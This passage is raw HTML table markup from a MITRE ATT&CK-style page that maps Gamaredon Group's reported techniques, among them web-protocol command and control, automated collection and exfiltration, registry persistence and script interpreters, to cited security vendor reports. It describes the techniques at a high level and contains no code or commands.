baseline;">[8]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1071"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1071</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1071/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1071"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Application Layer Protocol</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1071/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Web Protocols</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used HTTP and HTTPS for C2 communications.</span><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1119"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1119</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1119"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Automated Collection</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has deployed scripts on compromised systems that automatically scan for interesting documents.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1020"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1020</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1020"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Automated Exfiltration</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used modules that automatically upload gathered documents to the C2 server.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:56.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1547"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1547</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1547/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1547"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Boot or Logon Autostart Execution</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1547/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Registry Run Keys / Startup Folder</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> tools have registered Run keys in the registry to give malicious VBS files persistence.</span><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1059"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1059</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1059/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1059"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Command and Scripting Interpreter</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1059/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">PowerShell</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used obfuscated PowerShell scripts for staging.</span><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1059/003"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.003</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1059"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Command and Scripting Interpreter</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1059/003"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Windows Command Shell</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used various batch scripts to establish C2 and download additional files. </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">'s backdoor malware has also been written to a batch file.</span><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1059/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.005</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1059"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Command and Scripting Interpreter</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1059/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Visual Basic</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has embedded malicious macros in document templates, which executed VBScript. </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has also delivered Microsoft Outlook VBA projects with embedded macros.</span><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a><a href="https://www.secureworks.com/research/threat-profiles/iron-tilden"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[7]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p 